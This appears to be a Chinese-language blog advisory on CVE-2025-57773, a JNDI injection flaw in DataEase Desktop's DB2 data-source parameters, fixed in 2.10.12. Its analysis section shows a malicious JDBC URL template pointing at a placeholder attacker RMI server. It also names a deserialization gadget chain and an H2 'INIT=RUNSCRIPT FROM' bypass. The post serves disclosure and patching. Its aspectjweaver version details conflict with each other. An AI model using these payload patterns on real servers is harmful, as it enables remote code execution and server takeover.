首页 网络安全 正文
  • 本文约530字,阅读需3分钟
  • 17
  • 0

Dataease JNDI注入漏洞CVE-2025-57773

摘要

栋科技漏洞库关注到DataEase Desktop存在DataEase JNDI注入漏洞,该漏洞现已被追踪为CVE-2025-57773,漏洞的CVSS4.0评分8.2。

DataEase 是一款由杭州飞致云信息科技有限公司推出的开源数据可视化分析工具,提供拖拉拽式BI功能,支持多数据源连接与多端展示。

一、基本情况

DataEase适于企业级数据分析场景,支持多种数据源接入,提供报表、看板、可视化大屏等功能,帮助用户实现数据查询、分析与展示。

Dataease JNDI注入漏洞CVE-2025-57773

DataEase核心产品为基于Apache Doris开发的开源BI工具,支持JDBC、API多种数据连接方式,适用于BI报表、数据分析及可视化场景。

栋科技漏洞库关注到DataEase Desktop存在DataEase JNDI注入漏洞,该漏洞现已被追踪为CVE-2025-57773,漏洞的CVSS4.0评分8.2。

二、漏洞分析

CVE-2025-57773漏洞存在于2.10.12版本之前,由于DB2参数未被过滤,因此可以直接发起JNDI注入攻击,漏洞已在2.10.12版本中修复。

DB2数据源参数缺乏有效校验,攻击者可构造恶意JDBC URL(如jdbc:db2://…;clientRerouteServerListJNDIName=rmi://<恶意服务器>)。

之后呢,攻击者就能够直接触发JNDI远程加载,并结合commons-collections 4.x与aspectjweaver(<1.9.4)的Gadget链实现反序列化攻击,

之后就可达到任意文件写入或远程代码执行的目的,最终完全控制服务器,由于Dataease Desktop还存在逻辑绕过漏洞CVE-2025-57772,

由于CalciteProvider#getConnection方法中存在JDBC类型校验缺陷,攻击者可通过伪造数据库类型为oracle,绕过H2驱动相关过滤逻辑。

从而强制程序加载恶意构造的H2 JDBC URL,URL可包含危险参数(如INIT=RUNSCRIPT FROM),实现远程加载并执行恶意SQL脚本。

因此,这意味着JNDI触发AspectJ窃听器反序列化攻击,写入各种文件,从而可能会导致敏感数据泄露、系统被控制及进一步的横向渗透。

不过,需要特别说明的是,该漏洞需要公共集合4.x和aspectjweaver-1.9.22.jar。

三、影响范围

DataEase Desktop ≤ v2.10.11

四、修复建议

DataEase Desktop ≥v2.10.12

五、参考链接

管理员已设置登录后刷新可查看



扫描二维码,在手机上阅读
评论
更换验证码
友情链接